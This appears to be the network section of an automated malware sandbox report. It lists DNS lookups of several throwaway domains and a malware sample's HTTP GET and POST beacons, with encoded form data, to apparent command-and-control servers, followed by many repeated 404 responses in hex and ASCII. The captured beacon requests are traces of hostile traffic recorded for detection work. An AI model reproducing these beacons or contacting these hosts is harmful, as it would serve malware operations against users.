Source: global traffic	HTTP traffic detected: GET /g3wl/?kT9p=1CI2rntFLoR8LORJomanxZlvrsXZ8iOzXp0hteFUX7ZC4CpkEd9LFXVMj4GYlfKx8LXJCAGhhNbTKAnE5hN2yzgMyKEEG9EdyQR/qyvuetkdr/L/NuFg5/mzu6W7tc33QTvsPJE=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.donante-de-ovulos.bizConnection: closeUser-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14

Source: global traffic	DNS traffic detected: DNS query: www.crochetpets.online
Source: global traffic	DNS traffic detected: DNS query: www.n0pme6.top
Source: global traffic	DNS traffic detected: DNS query: www.kovallo.cloud
Source: global traffic	DNS traffic detected: DNS query: www.hentaistgma.net
Source: global traffic	DNS traffic detected: DNS query: www.ngmr.xyz
Source: global traffic	DNS traffic detected: DNS query: www.polarmuseum.info
Source: global traffic	DNS traffic detected: DNS query: www.tophcom.online
Source: global traffic	DNS traffic detected: DNS query: www.inf30027group23.xyz
Source: global traffic	DNS traffic detected: DNS query: www.donante-de-ovulos.biz
Source: global traffic	DNS traffic detected: DNS query: www.shopdj00.xyz

Source: unknown

HTTP traffic detected: POST /81ii/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.n0pme6.topOrigin: http://www.n0pme6.topConnection: closeCache-Control: no-cacheContent-Length: 209Content-Type: application/x-www-form-urlencodedReferer: http://www.n0pme6.top/81ii/User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14Data Raw: 6b 54 39 70 3d 76 47 77 4f 4a 33 78 42 46 48 33 4d 30 59 6e 2f 54 54 41 45 47 59 6d 54 42 56 53 4c 6e 6f 50 42 4a 62 65 4a 68 41 41 36 4f 6a 4d 48 5a 4f 30 5a 77 43 4b 64 42 49 39 7a 50 30 34 33 77 32 54 59 34 32 43 2b 2b 55 49 59 44 33 6a 5a 42 63 45 51 73 7a 4c 74 55 2f 43 68 38 59 66 2b 65 66 76 39 50 76 4a 46 71 2f 62 37 4a 32 45 48 2f 70 62 4c 61 42 54 41 54 66 33 6a 43 4d 64 2f 75 72 41 4b 63 49 64 6e 51 36 57 44 4e 67 75 54 6f 4c 37 2f 7a 6a 4b 74 79 38 4a 4f 36 51 4d 46 71 53 6e 47 52 6b 51 69 72 63 61 43 35 33 63 74 48 49 66 73 4c 43 4e 4f 53 61 33 63 53 6b 4a 74 50 67 46 39 75 4d 4d 4b 6e 77 4e 74 71 46 77 6c Data Ascii: kT9p=vGwOJ3xBFH3M0Yn/TTAEGYmTBVSLnoPBJbeJhAA6OjMHZO0ZwCKdBI9zP043w2TY42C++UIYD3jZBcEQszLtU/Ch8Yf+efv9PvJFq/b7J2EH/pbLaBTATf3jCMd/urAKcIdnQ6WDNguToL7/zjKty8JO6QMFqSnGRkQircaC53ctHIfsLCNOSa3cSkJtPgF9uMMKnwNtqFwl

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 03:39:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 03:39:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 03:39:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Oct 2024 03:39:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:39:27 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:39:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:39:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:39:35 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 68 72 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qhr1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Tue, 22 Oct 2024 04:03:12 GMTX-Varnish: 1435552209Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Tue, 22 Oct 2024 04:03:14 GMTX-Varnish: 1435552220Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Tue, 22 Oct 2024 04:03:17 GMTX-Varnish: 1435552224Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Tue, 22 Oct 2024 04:03:19 GMTX-Varnish: 1435552229Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:40:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:40:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:40:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Oct 2024 03:40:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

